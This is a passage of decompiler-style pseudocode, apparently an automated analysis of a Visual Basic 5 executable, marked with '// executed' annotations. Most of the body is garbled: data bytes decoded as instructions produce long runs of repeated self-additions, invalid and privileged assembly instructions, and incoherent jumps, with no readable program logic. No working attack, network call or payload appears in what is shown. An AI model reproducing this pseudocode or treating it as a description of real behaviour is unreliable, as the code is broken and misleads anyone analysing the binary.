                          				intOrPtr* _t283;
                          				intOrPtr* _t284;
                          				intOrPtr* _t285;
                          				intOrPtr* _t287;
                          				intOrPtr* _t289;
                          				void* _t290;
                          				intOrPtr* _t291;
                          				void* _t292;
                          				intOrPtr* _t293;
                          				void* _t295;
                          				intOrPtr* _t296;
                          				void* _t297;
                          				intOrPtr* _t298;
                          				signed char _t300;
                          				signed int _t301;
                          				signed char _t302;
                          				intOrPtr* _t303;
                          				void* _t304;
                          				signed int _t305;
                          				intOrPtr* _t307;
                          				intOrPtr* _t308;
                          				void* _t309;
                          				intOrPtr* _t310;
                          				intOrPtr* _t311;
                          				intOrPtr* _t312;
                          				intOrPtr* _t313;
                          				signed int _t314;
                          				void* _t315;
                          				intOrPtr* _t316;
                          				signed char _t317;
                          				intOrPtr* _t319;
                          				intOrPtr* _t322;
                          				intOrPtr* _t323;
                          				intOrPtr* _t324;
                          				signed char _t325;
                          				signed int _t329;
                          				void* _t331;
                          				signed int _t334;
                          				void* _t336;
                          				signed char _t339;
                          				void* _t340;
                          				signed int _t341;
                          				signed int _t342;
                          				signed char _t344;
                          				intOrPtr* _t347;
                          				void* _t348;
                          				signed int _t351;
                          				signed int _t352;
                          				signed int _t355;
                          				intOrPtr* _t356;
                          				intOrPtr* _t357;
                          				intOrPtr* _t358;
                          				void* _t359;
                          				void* _t360;
                          				void* _t361;
                          				signed char _t362;
                          				signed int _t367;
                          				intOrPtr* _t369;
                          				signed int _t370;
                          				signed int _t372;
                          				signed int _t373;
                          				void* _t379;
                          				signed int _t380;
                          				signed char _t383;
                          				void* _t384;
                          				intOrPtr* _t385;
                          				signed int _t387;
                          				signed int _t390;
                          				signed int _t394;
                          				intOrPtr* _t395;
                          				void* _t396;
                          				void* _t401;
                          				signed int _t402;
                          				signed int _t406;
                          				void* _t407;
                          				void* _t408;
                          				signed int _t409;
                          				signed int _t411;
                          				signed int _t414;
                          				signed int _t415;
                          				signed int _t417;
                          				void* _t419;
                          				void* _t420;
                          				void* _t422;
                          				signed int _t423;
                          				intOrPtr _t438;
                          				signed int _t440;
                          				intOrPtr _t448;
                          				intOrPtr _t449;
                          				intOrPtr _t450;
                          				intOrPtr _t451;
                          				signed int _t454;
                          				intOrPtr _t462;
                          				intOrPtr _t464;
                          				intOrPtr _t467;
                          				intOrPtr _t470;
                          				signed int _t476;
                          				intOrPtr* _t479;
                          				signed char _t483;
                          				intOrPtr _t484;
                          				signed char _t489;
                          				intOrPtr _t490;
                          				signed char _t493;
                          				intOrPtr _t498;
                          
                          				_t380 = __edx;
                          				_t369 = __ecx;
                          				_push("VB5!6&*"); // executed
                          				L00401210(); // executed
                          				 *__eax =  *__eax + __eax;
                          				 *__eax =  *__eax + __eax;
                          				 *__eax =  *__eax + __eax;
                          				 *__eax =  *__eax ^ __eax;
                          				 *__eax =  *__eax + __eax;
                          				_t253 = __eax + 1;
                          				 *_t253 =  *_t253 + _t253;
                          				 *_t253 =  *_t253 + _t253;
                          				 *_t253 =  *_t253 + _t253;
                          				 *__edi =  *__edi + _t253;
                          				_t254 = _t253 | 0x000000c7;
                          				asm("stosd");
                          				asm("pushfd");
                          				_t354 = __ebx + _t254;
                          				_t394 = __esi + 1;
                          				_t255 = __edi;
                          				_t383 = _t254;
                          				asm("sbb eax, 0xa17d13c7");
                          				asm("popad");
                          				asm("in eax, 0x0");
                          				 *__edi =  *__edi + __edi;
                          				 *__edi =  *__edi + __edi;
                          				 *__ecx =  *__ecx + __edi;
                          				 *__edi =  *__edi + __edi;
                          				 *__edi =  *__edi + __edi;
                          				 *((intOrPtr*)(__edi + __edi)) =  *((intOrPtr*)(__edi + __edi)) + __edi;
                          				 *__edi =  *__edi + __edi;
                          				asm("popad");
                          				asm("o16 jz 0x75");
                          				if( *__edi >= 0) {
                          					L4:
                          					_t383 = _t383 - 1;
                          					 *_t255 =  *_t255 + _t255;
                          				} else {
                          					 *__edi =  *__edi + __edi;
                          					 *__edi =  *__edi + __edi;
                          					 *__edi =  *__edi + __edi;
                          					 *__edi =  *__edi + __edi;
                          					 *__edi =  *__edi + __edi;
                          					_t414 =  *(_t401 + 0x74) * 0x73 - 1;
                          					 *__edi =  *__edi ^ __edi;
                          					_pop(ds);
                          					_t401 = 0xafadf0f4;
                          					_t352 = _t354;
                          					_t354 = __edi;
                          					 *0xFFFFFFFFAFADF0A0 =  *0xFFFFFFFFAFADF0A0 | 0x000000ed;
                          					_t255 = _t352 - 0xb9;
                          					 *((intOrPtr*)(__edx + 0x3ba912d4)) = cs;
                          					asm("cmc");
                          					asm("invalid");
                          					if(_t255 >= 0) {
                          						 *0xaa7e7c1b = _t255;
                          						_t255 = _t255 + 0xf0;
                          						_push(0xafadf0f4);
                          						_t354 = __edi ^  *(__ecx - 0x48ee309a);
                          						asm("cdq");
                          						asm("iretw");
                          						asm("adc [edi+0xaa000c], esi");
                          						asm("pushad");
                          						asm("rcl dword [ebx], cl");
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						 *_t255 =  *_t255 + _t255;
                          						asm("rol dword [0x4f0000], 0x0");
                          						goto L4;
                          					}
                          				}
                          				 *_t255 =  *_t255 + _t255;
                          				_t256 = _t255 |  *_t255;
                          				_push(_t394);
                          				asm("gs outsb");
                          				if(_t256 != 0) {
                          					L10:
                          					_t257 = _t256 |  *_t256;
                          					_t440 = _t257;
                          					_push(_t414);
                          					if(_t440 < 0) {
                          						goto L18;
                          					} else {
                          						asm("a16 jz 0x77");
                          						asm("popad");
                          						if(_t440 != 0) {
                          							 *_t394 =  *_t394 + _t257;
                          							 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t257;
                          							asm("bound ebp, [ecx+0x6c]");
                          							asm("bound eax, [eax]");
                          							_t347 = _t257 + 0x5e50748;
                          							asm("sti");
                          							_pop(es);
                          							asm("adc al, [ecx]");
                          							_t354 = _t354 + _t354;
                          							_t401 = _t401 +  *_t394;
                          							 *_t347 =  *_t347 + _t347;
                          							 *_t354 =  *_t354 + _t347;
                          							_t348 = _t347 + 0x706e5500;
                          							asm("insb");
                          							 *[gs:esi] =  *[gs:esi] + _t348;
                          							 *_t383 =  *_t383 + _t369;
                          							 *((intOrPtr*)(_t369 + 0x6e)) =  *((intOrPtr*)(_t369 + 0x6e)) + _t369;
                          							_t394 =  *(_t354 + 0x64) * 0x5003165;
                          							asm("repne push es");
                          							asm("in eax, 0x6");
                          							asm("cli");
                          							 *_t380 =  *_t380 + _t380;
                          							_t257 = _t348 + 0xb9 +  *((intOrPtr*)(_t348 + 0xb9));
                          							goto L14;
                          						}
                          					}
                          				} else {
                          					asm("gs insb");
                          					asm("popad");
                          					asm("outsb");
                          					_t351 = _t256 ^ 0x00000000 | 0x76000c01;
                          					asm("popad");
                          					asm("insb");
                          					asm("a16 insd");
                          					asm("gs outsb");
                          					 *_t351 =  *_t351 + _t351;
                          					_t380 = _t380 + 1;
                          					 *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) =  *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) + _t351;
                          					 *(_t394 + 0x61) =  *(_t394 + 0x61) + _t380;
                          					asm("insb");
                          					asm("a16 insd");
                          					asm("gs outsb");
                          					 *_t351 =  *_t351 + _t351;
                          					asm("sbb eax, [es:eax]");
                          					 *((intOrPtr*)(_t401 + 0x18)) =  *((intOrPtr*)(_t401 + 0x18)) + _t351;
                          					 *_t351 =  *_t351 + _t351;
                          					_t257 =  *(_t383 + 0x68) * 0x35006465;
                          					_t414 = _t351;
                          					asm("sbb eax, 0x440000");
                          					_t394 = _t394 + 1;
                          					_t383 = _t383 + _t383;
                          					 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t401;
                          					 *_t257 =  *_t257 + _t257;
                          					 *0x6d615300 =  *0x6d615300 + _t257;
                          					asm("insd");
                          					 *[gs:esi] =  *[gs:esi] + _t257;
                          					 *0x72655400 =  *0x72655400 + _t369;
                          					_t438 =  *0x72655400;
                          					if(_t438 != 0) {
                          						L15:
                          						_pop(es);
                          						 *((intOrPtr*)(_t380 + 0x75)) =  *((intOrPtr*)(_t380 + 0x75)) + _t380;
                          						asm("outsb");
                          						goto L16;
                          					} else {
                          						if(_t438 == 0) {
                          							L14:
                          							_t354 = _t354 + _t354;
                          							_t401 = _t401 +  *_t380;
                          							 *_t257 =  *_t257 + _t257;
                          							 *((intOrPtr*)(_t383 + _t257)) =  *((intOrPtr*)(_t383 + _t257)) + _t257;
                          							goto L15;
                          						} else {
                          							if(_t438 >= 0) {
                          								L16:
                          								asm("a16 jae 0x77");
                          								 *[gs:esi] =  *[gs:esi] + _t257;
                          								 *_t369 =  *_t369 + _t369;
                          								 *((intOrPtr*)(_t394 + 0x6f)) =  *((intOrPtr*)(_t394 + 0x6f)) + _t257;
                          								asm("insb");
                          								asm("a16 aaa");
                          								 *0x28e0146 =  *0x28e0146 + _t257;
                          								if( *0x28e0146 >= 0) {
                          									 *(_t380 + _t380) =  *(_t380 + _t380) + 1;
                          									L18:
                          									_t257 = _t257 +  *_t257;
                          								}
                          								_t354 = _t354 + _t354;
                          								_t401 = _t401 +  *((intOrPtr*)(_t257 + _t257));
                          							} else {
                          								_t394 = 1 +  *_t380 * 5;
                          								asm("movsd");
                          								_t256 = _t257 + 0x120296;
                          								_t354 = _t354 +  *((intOrPtr*)(_t401 + 7)) + _t354 +  *((intOrPtr*)(_t401 + 7));
                          								_t401 = _t401 +  *_t256;
                          								 *_t256 =  *_t256 + _t256;
                          								 *_t380 =  *_t380 + _t256;
                          								goto L10;
                          							}
                          						}
                          					}
                          				}
                          				 *_t257 =  *_t257 + _t257;
                          				_t258 = _t257 + 0x54530008;
                          				_t384 = _t383 - 1;
                          				_push(_t380);
                          				_t370 = _t369 + 1;
                          				_t355 = _t354 - 1;
                          				_push(_t355);
                          				_t402 = _t401 + 1;
                          				 *_t394 =  *_t394 + _t258;
                          				 *_t380 =  *_t380 + _t370;
                          				 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t258;
                          				asm("insb");
                          				_t415 =  *(_t384 + 0x73) * 0x7474616d;
                          				 *0x88003cf =  *0x88003cf + _t258;
                          				_t385 = _t384 - 1;
                          				 *_t380 =  *_t380 + _t380;
                          				 *_t355 =  *_t355 + 1;
                          				_t261 = _t258 + 0xdb ^  *(_t258 + 0xdb);
                          				 *_t261 =  *_t261 + _t261;
                          				_push(es);
                          				_t262 = _t261 |  *_t261;
                          				_push(_t262);
                          				if(_t262 >= 0) {
                          					L30:
                          					_t380 = _t380 +  *((intOrPtr*)(_t370 + 0x30031c03));
                          					 *_t380 =  *_t380 + _t380;
                          					_pop(es);
                          					_t355 = _t355 + _t355;
                          					goto L31;
                          				} else {
                          					asm("arpl [eax+0x6f], bp");
                          					_t415 =  *[fs:ecx+0x38] * 0xe010600;
                          					_t41 = _t394 + 0x67;
                          					 *_t41 =  *((intOrPtr*)(_t394 + 0x67)) + _t370;
                          					_t448 =  *_t41;
                          					asm("insb");
                          					asm("gs outsb");
                          					asm("popad");
                          					if(_t448 <= 0) {
                          						L31:
                          						 *_t355 =  *_t355 + 1;
                          						asm("das");
                          						 *_t262 =  *_t262 + _t262;
                          						 *_t370 =  *_t370 + _t370;
                          						asm("str word [ebx+0x75]");
                          						goto L32;
                          					} else {
                          						if(_t448 >= 0) {
                          							L32:
                          							_t355 = _t355 - 1;
                          							_t454 = _t355;
                          							if(_t454 != 0) {
                          								asm("bound esp, [ebp+0x6c]");
                          								goto L48;
                          							} else {
                          								if(_t454 >= 0) {
                          									L51:
                          									 *_t355 =  *_t355 + 1;
                          									_t265 = (_t262 |  *_t262) - 0xc000000 + 0x52594400;
                          									_t402 = _t402 + 1;
                          									_push(_t265);
                          									 *_t394 =  *_t394 + _t265;
                          									 *_t394 =  *_t394 + _t370;
                          									_t59 = _t355 + 0x65;
                          									 *_t59 =  *((intOrPtr*)(_t355 + 0x65)) + _t265;
                          									_t464 =  *_t59;
                          									if(_t464 < 0) {
                          										goto L63;
                          									} else {
                          										asm("bound esi, [edx+0x6f]");
                          										if(_t464 >= 0) {
                          											goto L64;
                          										} else {
                          											_t402 =  *(_t394 + 0x61) * 0x500746e;
                          											_push(6);
                          											asm("aam 0x4");
                          											_push(_t394);
                          											_t265 = _t265 + 0xffffffffff000b44;
                          											 *_t265 =  *_t265 + _t265;
                          											 *0x68610005 =  *0x68610005 + _t370;
                          											asm("arpl [edi+0x70], bp");
                          											 *_t394 =  *_t394 + _t265;
                          											 *((intOrPtr*)(_t265 + _t265)) =  *((intOrPtr*)(_t265 + _t265)) + _t370;
                          											_t402 = _t402 +  *_t355 + 1;
                          											asm("outsb");
                          											_t417 =  *(_t402 + 0x6c) * 0x74;
                          											asm("insd");
                          											asm("popad");
                          											asm("outsb");
                          											if(_t417 >= 0) {
                          												goto L65;
                          											} else {
                          												 *0x37303b3 =  *0x37303b3 + _t265;
                          												_t467 =  *0x37303b3;
                          												if(_t467 < 0) {
                          													_t339 = _t265 ^  *(_t394 + _t355 * 4);
                          													goto L58;
                          												}
                          												goto L59;
                          											}
                          										}
                          									}
                          								} else {
                          									if(_t454 < 0) {
                          										goto L45;
                          									} else {
                          										if(_t454 >= 0) {
                          											L50:
                          											_pop(_t355);
                          											 *((intOrPtr*)(_t394 + 2)) =  *((intOrPtr*)(_t394 + 2)) + _t370;
                          											goto L51;
                          										} else {
                          											if(_t454 < 0) {
                          												L48:
                          												asm("insb");
                          												if (_t462 == 0) goto L49;
                          												_t262 = _t262 + 0x15b0447;
                          												goto L50;
                          											} else {
                          												asm("a16 outsb");
                          												 *_t262 =  *_t262 ^ _t262;
                          												_push(es);
                          												 *_t394 =  *_t394 + _t262;
                          												 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t262;
                          												asm("fs outsb");
                          												goto L38;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						} else {
                          							asm("o16 insb");
                          							 *_t262 =  *_t262 ^ _t262;
                          							_t262 = _t262 + 0x7080100;
                          							asm("movsd");
                          							_push(es);
                          							 *_t385 =  *_t385 + _t262;
                          							asm("adc al, [0x2d03ff00]");
                          							 *_t262 =  *_t262 + _t262;
                          							 *_t385 =  *_t385 + _t262;
                          							 *_t262 =  *_t262 | _t262;
                          							_t370 = _t355;
                          							_t394 = _t394 - 0xffffffffffffffff;
                          							_t385 = _t385;
                          							_push(_t262);
                          							_push(_t415);
                          							 *_t394 =  *_t394 + _t262;
                          							 *_t380 =  *_t380 + _t370;
                          							_t43 = _t355 + 0x61;
                          							 *_t43 =  *((intOrPtr*)(_t355 + 0x61)) + _t262;
                          							_t449 =  *_t43;
                          							if(_t449 < 0) {
                          								L38:
                          								asm("outsb");
                          								_t340 = _t262 + 0x790076b;
                          								asm("stc");
                          								_t355 = _t355 + _t340;
                          								_t341 = _t340 + 0x12;
                          								 *_t341 =  *_t341 | _t341;
                          								 *_t355 =  *_t355 + 1;
                          								_t342 = _t341 & 0x0a000000;
                          								goto L39;
                          							} else {
                          								asm("outsb");
                          								asm("popad");
                          								if(_t449 < 0) {
                          									L39:
                          									_t265 = _t342;
                          									asm("o16 jb 0x72");
                          									if (_t265 >= 0) goto L40;
                          									_push(es);
                          									 *_t385 =  *_t385 + _t265;
                          									_t53 = _t385 + 0x65;
                          									 *_t53 =  *((intOrPtr*)(_t385 + 0x65)) + _t265;
                          									asm("outsb");
                          									if ( *_t53 < 0) goto L54;
                          									goto L41;
                          								} else {
                          									asm("movsb");
                          									_t385 = _t385 +  *((intOrPtr*)(_t380 + 0x61205));
                          									 *_t355 =  *_t355 + 1;
                          									_t344 = (_t262 ^ 0x00000000) + 0x808087b;
                          									 *_t344 =  *_t344 + _t344;
                          									 *_t355 =  *_t355 | _t370;
                          									_t46 = _t380 + 0x69;
                          									 *_t46 =  *((intOrPtr*)(_t380 + 0x69)) + _t344;
                          									_t450 =  *_t46;
                          									if(_t450 >= 0) {
                          										 *_t344 =  *_t344 | _t344;
                          										 *_t355 =  *_t355 + 1;
                          										_t339 = _t344 ^  *_t344;
                          										 *_t339 =  *_t339 + _t339;
                          										_t370 = _t370 |  *0x62757300;
                          										asm("bound esp, [ecx+0x6c]");
                          										asm("insb");
                          										asm("popad");
                          										if(_t370 >= 0) {
                          											L58:
                          											_t265 = _t339 + 0x9e;
                          											L59:
                          											_t380 = _t380 +  *_t380;
                          											 *_t355 =  *_t355 + 1;
                          											_t265 = _t265 - 0xe000000;
                          											_push(cs);
                          											_t67 = _t355 + 0x6d;
                          											 *_t67 =  *((intOrPtr*)(_t355 + 0x6d)) + _t380;
                          											_t470 =  *_t67;
                          											asm("outsd");
                          											if(_t470 != 0) {
                          												asm("adc [edx], ecx");
                          												goto L69;
                          											} else {
                          												if(_t470 < 0) {
                          													L69:
                          													_t265 = _t265 |  *_t265;
                          													_t476 = _t265;
                          													asm("popad");
                          													asm("outsb");
                          													if(_t476 == 0) {
                          														goto L77;
                          													} else {
                          														goto L70;
                          													}
                          												} else {
                          													if(_t470 >= 0) {
                          														L70:
                          														if(_t476 < 0) {
                          															L79:
                          															_push(es);
                          															asm("adc dl, [edx]");
                          															_t356 = _t355 + _t355;
                          															 *_t268 =  *_t268 + _t268;
                          															 *((intOrPtr*)(_t356 + _t370)) =  *((intOrPtr*)(_t356 + _t370)) + _t380;
                          															 *((intOrPtr*)(_t385 + 0x43)) =  *((intOrPtr*)(_t385 + 0x43)) + _t370;
                          															_push(_t417);
                          															_t269 = _t268 - 1;
                          															_t406 = _t402 +  *_t370 + 1;
                          															_push(_t380);
                          															_t372 = _t370 + 2;
                          															_t419 = _t417 + 1 - 1;
                          															_t380 = _t380 + 1;
                          															 *_t394 =  *_t394 + _t269;
                          															 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t269;
                          															asm("outsb");
                          															asm("outsd");
                          															asm("outsb");
                          															 *[gs:0x797043b] =  *[gs:0x797043b] + _t269;
                          														} else {
                          															if(_t476 != 0) {
                          																L76:
                          																asm("gs outsb");
                          																L77:
                          																asm("outsb");
                          																if (_t479 >= 0) goto L78;
                          																_t268 = _t265 + 0x041e042b ^  *_t380;
                          																asm("rol dword [esi], 0x12");
                          																goto L79;
                          															} else {
                          																asm("gs outsb");
                          																 *_t394 =  *_t394 + _t265;
                          																 *_t385 =  *_t385 + _t265;
                          																 *((intOrPtr*)(_t355 + 0x50)) =  *((intOrPtr*)(_t355 + 0x50)) + _t380;
                          																_pop(_t379);
                          																_t372 = _t379 - 1;
                          																_t394 = _t394;
                          																 *0x496053c =  *0x496053c + _t265;
                          																asm("lahf");
                          																es = _t417;
                          																asm("adc dl, [eax]");
                          																_t356 = _t355 + _t355;
                          																_t406 = _t402 +  *_t372;
                          																 *_t265 =  *_t265 + _t265;
                          																 *_t380 =  *_t380 + _t380;
                          																_t269 = _t265;
                          																_t419 = _t417 + 1;
                          																asm("gs insd");
                          																asm("outsd");
                          																 *_t394 =  *_t394 + _t269;
                          																 *_t356 =  *_t356 + _t372;
                          																_t78 = _t372 + 0x62 + _t406 * 2;
                          																 *_t78 =  *((intOrPtr*)(_t372 + 0x62 + _t406 * 2)) + _t372;
                          																if( *_t78 >= 0) {
                          																	asm("insb");
                          																	_t390 =  *(_t380 + 0x61) * 0x80050074;
                          																	 *0x31d0480 =  *0x31d0480 + _t269;
                          																	_t265 = _t269 ^  *0x111205f4;
                          																	_t355 = _t356 + _t356;
                          																	_t402 = _t406 +  *_t394;
                          																	 *_t265 =  *_t265 + _t265;
                          																	 *_t355 =  *_t355 + _t380;
                          																	_pop(es);
                          																	 *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) =  *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) + _t265;
                          																	_t394 = _t394 - 1;
                          																	_t385 = _t390 + 1 - 1;
                          																	_t479 = _t385;
                          																	_push(_t355);
                          																	 *_t394 =  *_t394 + _t265;
                          																	 *0x6c6f4300 =  *0x6c6f4300 + _t370;
                          																	asm("insb");
                          																	asm("popad");
                          																	asm("bound esi, [ebx+0x61]");
                          																	asm("insd");
                          																	asm("insd");
                          																	goto L76;
                          																}
                          															}
                          														}
                          													} else {
                          														asm("bound ebp, [edi+0x72]");
                          														 *[fs:esi] =  *[fs:esi] + _t265;
                          														 *0x726b7300 =  *0x726b7300 + _t265;
                          														_t415 =  *_t394 * 5;
                          														L63:
                          														_t266 = _t265 + 0x1fa00e5;
                          														 *_t394 = _t266;
                          														asm("repne add [edx], edx");
                          														_t265 = _t266 | 0x2703ff00;
                          														 *_t265 =  *_t265 + _t265;
                          														L64:
                          														 *_t265 =  *_t265 + _t265;
                          														asm("invd");
                          														 *((intOrPtr*)(_t385 + 0x4f)) =  *((intOrPtr*)(_t385 + 0x4f)) + _t380;
                          														_push(_t394);
                          														_push(_t380);
                          														_t370 = _t370 + 1;
                          														 *_t394 =  *_t394 + _t265;
                          														 *0x4b454200 =  *0x4b454200 + _t265;
                          														_t402 = _t402 + 1;
                          														_push(_t265);
                          														 *0x2fb085f =  *0x2fb085f + _t265;
                          														 *_t355 = _t265;
                          														asm("rol byte [edx], 0x12");
                          														_push(cs);
                          														_t355 = _t355 + _t355;
                          														_t417 = _t415 - 1 +  *((intOrPtr*)(_t265 + _t265));
                          														 *_t265 =  *_t265 + _t265;
                          														asm("adc [eax+eax], al");
                          														L65:
                          														 *((intOrPtr*)(_t355 + 0x63)) =  *((intOrPtr*)(_t355 + 0x63)) + _t380;
                          													}
                          												}
                          											}
                          										} else {
                          											goto L44;
                          										}
                          									} else {
                          										if(_t450 == 0) {
                          											L41:
                          											_t417 =  *_t355 * 0x2b049c05;
                          										} else {
                          											asm("outsb");
                          											 *[gs:0x701] =  *[gs:0x701] + _t344;
                          											_t48 = _t355 + 0x72;
                          											 *_t48 =  *((intOrPtr*)(_t355 + 0x72)) + _t380;
                          											_t451 =  *_t48;
                          											if(_t451 >= 0) {
                          												L44:
                          												_push(0x6006c61);
                          												 *_t355 =  *_t355 + _t370;
                          												_t55 = _t394 + 0x6c;
                          												 *_t55 =  *((intOrPtr*)(_t394 + 0x6c)) + _t339;
                          												_t462 =  *_t55;
                          												if (_t462 < 0) goto L56;
                          												L45:
                          												asm("fs outsd");
                          											} else {
                          												asm("outsb");
                          												if (_t451 == 0) goto L29;
                          												_t262 = _t344 + 0x3b102ce;
                          												goto L30;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				_t270 = _t269 + 0x97;
                          				_pop(es);
                          				asm("stosb");
                          				_t420 = _t419 + _t394;
                          				_pop(es);
                          				asm("adc dl, [ebx]");
                          				_t357 = _t356 + _t356;
                          				_t407 = _t406 +  *_t394;
                          				 *_t270 =  *_t270 + _t270;
                          				 *0x6e550005 =  *0x6e550005 + _t380;
                          				_push(0x6006961);
                          				 *_t385 =  *_t385 + _t372;
                          				_t97 = _t380 + 0x65;
                          				 *_t97 =  *((intOrPtr*)(_t380 + 0x65)) + _t270;
                          				asm("popad");
                          				asm("arpl [edi+0x6e], bp");
                          				if( *_t97 >= 0) {
                          					L87:
                          					_t372 = _t372 + 1;
                          					_t271 = _t270 + 0x2f300dd;
                          					asm("adc dl, [esi]");
                          					_t357 = _t357 + _t357;
                          					_t407 = _t407 +  *((intOrPtr*)(_t271 + _t271));
                          					 *_t271 =  *_t271 + _t271;
                          					asm("sbb [eax], cl");
                          					 *((intOrPtr*)(_t407 + 0x61)) =  *((intOrPtr*)(_t407 + 0x61)) + _t372;
                          					asm("a16 outsb");
                          					_t394 =  *(_t271 + 0x6f) * 0x1060074;
                          					_t272 = _t271 |  *_t271;
                          					goto L88;
                          				} else {
                          					asm("insb");
                          					asm("popad");
                          					asm("popad");
                          					asm("outsb");
                          					 *_t372 = _t270 + 0x3a60107;
                          					asm("rol byte [ebx], 1");
                          					asm("adc dl, [eax+eax]");
                          					 *_t357 =  *_t357 + 1;
                          					_t272 =  *_t372 ^ 0x16000000;
                          					_t483 = _t272;
                          					asm("lldt word [ebx+0x69]");
                          					asm("insb");
                          					if(_t483 == 0) {
                          						L89:
                          						asm("popad");
                          						asm("outsb");
                          						asm("arpl [ebp+0x6c], sp");
                          						goto L90;
                          					} else {
                          						if(_t483 < 0) {
                          							L88:
                          							 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t380;
                          							asm("insd");
                          							goto L89;
                          						} else {
                          							asm("outsd");
                          							if(_t483 < 0) {
                          								L90:
                          								asm("insb");
                          								_t274 = (_t272 ^  *[gs:eax]) + 0xea07d7;
                          								goto L91;
                          							} else {
                          								_t334 = _t272 ^  *_t272;
                          								_push(es);
                          								 *((intOrPtr*)(_t334 + _t334)) =  *((intOrPtr*)(_t334 + _t334)) + _t372;
                          								asm("popad");
                          								_push(0x5006465);
                          								 *_t394 =  *_t394 | _t334;
                          								_t336 = _t334 + 0xdf;
                          								_t422 = _t420 +  *0x151202;
                          								 *_t357 =  *_t357 + 1;
                          								 *[cs:eax] =  *[cs:eax] + _t336;
                          								 *_t385 =  *_t385 + _t380;
                          								_t278 = _t336 + 0x41524700;
                          								_push(_t394);
                          								_t408 = 1 +  *(_t420 + 0x73) * 0x61726c6a;
                          								 *_t394 =  *_t394 + _t278;
                          								 *_t385 =  *_t385 + _t372;
                          								_t103 = _t278 + 0x69;
                          								 *_t103 =  *((intOrPtr*)(_t278 + 0x69)) + _t380;
                          								_t484 =  *_t103;
                          								asm("insb");
                          								_push(0x6d657261);
                          								if(_t484 < 0) {
                          									if(_t484 > 0) {
                          										 *0x54105b4 =  *0x54105b4 + _t278;
                          										goto L87;
                          									}
                          									L91:
                          									 *((intOrPtr*)(_t274 + _t372)) =  *((intOrPtr*)(_t274 + _t372)) + _t274;
                          									_pop(ss);
                          									_t357 = _t357 + _t357;
                          									 *((intOrPtr*)(_t274 + 0x12)) =  *((intOrPtr*)(_t274 + 0x12)) + _t274 + 0x12;
                          									 *_t372 =  *_t372 + _t357;
                          									_t277 =  *[fs:eax] * 0x80106;
                          									_t394 = _t394 + 1;
                          									_t408 = _t407 + 1;
                          									_t380 = _t380 - 1;
                          									_t422 = _t420 +  *_t385 - 1;
                          									_push(_t277);
                          									_push(_t380);
                          									_t385 = _t385 - 1;
                          									_push(_t422);
                          									 *0x4c90290 =  *0x4c90290 + _t277;
                          									_t372 = _t372 +  *_t277;
                          									asm("adc eax, 0x181202");
                          									 *_t357 =  *_t357 + 1;
                          									_t278 = _t277 & 0x00000000;
                          									 *_t278 =  *_t278 + _t278;
                          									asm("sbb al, [eax+eax]");
                          								}
                          							}
                          						}
                          					}
                          				}
                          				_t279 = _t278;
                          				_t423 = _t422 + 1;
                          				asm("arpl [gs:ecx], bp");
                          				_push(es);
                          				 *_t394 =  *_t394 + _t279;
                          				 *((intOrPtr*)(_t279 + 0x52)) =  *((intOrPtr*)(_t279 + 0x52)) + _t380;
                          				_t387 = _t385 - 1 + 1;
                          				_push(_t380);
                          				_t373 = _t372 + 1;
                          				 *0x35001d5 =  *0x35001d5 + _t279;
                          				 *_t380 = _t279;
                          				asm("adc bl, [ecx]");
                          				_t358 = _t357 + _t357;
                          				_t409 = _t408 +  *_t394;
                          				 *_t279 =  *_t279 + _t279;
                          				 *_t358 =  *_t358 + _t358;
                          				_t280 = _t279 |  *_t279;
                          				_t489 = _t280;
                          				if(_t489 < 0) {
                          					L98:
                          					_push(_t380);
                          					_push(_t423);
                          					_t373 = _t373 + 1 - 1;
                          					_t387 = _t387 - 1;
                          					_t394 = _t394 - 1;
                          					goto L99;
                          				} else {
                          					if(_t489 <= 0) {
                          						L99:
                          						_push(_t358);
                          						_push(_t423);
                          						 *_t394 =  *_t394 + _t280;
                          						 *((intOrPtr*)(_t280 + _t280)) =  *((intOrPtr*)(_t280 + _t280)) + _t373;
                          						_push(_t409);
                          						asm("outsb");
                          						_t423 =  *(_t387 + 0x6c) * 0x75646e61;
                          						asm("insb");
                          						asm("popad");
                          						_t282 = (_t280 ^  *_t280) + 0x5ec062c;
                          						asm("lodsb");
                          						_push(es);
                          						_push(ss);
                          						_push(es);
                          						asm("adc bl, [eax+eax]");
                          						 *_t358 =  *_t358 + 1;
                          						 *_t282 =  *_t282 - _t282;
                          						 *_t282 =  *_t282 + _t282;
                          						_push(ds);
                          						_t280 = _t282 |  *_t282;
                          						_t493 = _t280;
                          						asm("insb");
                          						asm("a16 gs insd");
                          						if(_t493 <= 0) {
                          							asm("popad");
                          							if (_t493 == 0) goto L101;
                          							_push(es);
                          							goto L102;
                          						}
                          					} else {
                          						if(_t489 <= 0) {
                          							goto L98;
                          						} else {
                          							asm("bound ebp, [ecx+edi*2+0x74]");
                          							 *_t394 =  *_t394 + _t280;
                          							 *_t380 =  *_t380 + _t373;
                          							 *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) =  *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) + _t380;
                          							_push(0x65);
                          							asm("insb");
                          							asm("popad");
                          							asm("outsb");
